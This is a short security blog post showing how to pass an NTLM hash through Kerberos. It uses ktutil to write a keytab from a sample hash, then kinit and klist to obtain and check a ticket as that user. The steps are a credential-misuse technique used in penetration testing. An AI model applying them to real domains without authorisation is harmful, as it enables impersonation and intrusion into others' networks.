Pass the Hash with Kerberos
This blog post may be of limited use, most of the time that you have a NTLM hash you have the tools to use it. But, if you find yourself in a situation where you don’t have to tools and do have kerberos tools, you can pass the hash with it.
Lets say with have the NTLM hash for the user uberuser
and the hash is 88e4d9fabaecf3dec18dd80905521b29
. The first step to do so is to create a keytab file using ktutil
:
root@wpad:~# ktutil
At the ktutil
prompt, type in the “add entry” (addent
) command with the “principle” (-p
) flag. Specify the user and an all uppercase version of the FQDN. Then the “KVNO” (-k 1
), which is the key number. Finally the encryption type, which is rc4-hmac
for NTLM hashes:
ktutil: addent -p [email protected] -k 1 -key -e rc4-hmac
After you hit enter you’ll get prompted for the rc4-hmac (NTLM) hash:
Key for [email protected] (hex): 88e4d9fabaecf3dec18dd80905521b29
Then we write the keytab file to disk and exit ktutil
ktutil: wkt /tmp/a.keytab
ktutil: exit
The last step before we can use our authentication is to create a kerberos ticket using our keytab file.
root@wpad:~# kinit -V -k -t /tmp/a.keytab -f [email protected]
Using default cache: /tmp/krb5cc_0
Using principal: [email protected]
Using keytab: /tmp/a.keytab
Authenticated to Kerberos v5
Validate it with klist
:
root@wpad:~# klist
Ticket cache: FILE:/tmp/krb5cc_0
Default principal: [email protected]
Valid starting Expires Service principal
07/22/2018 21:38:43 07/23/2018 07:38:43 krbtgt/[email protected]
renew until 07/23/2018 21:38:40
*** This is a Security Bloggers Network syndicated blog from malicious.link authored by Malicious Link. Read the original post at: http://feedproxy.google.com/~r/Room362com/~3/e_oUMV65xEQ/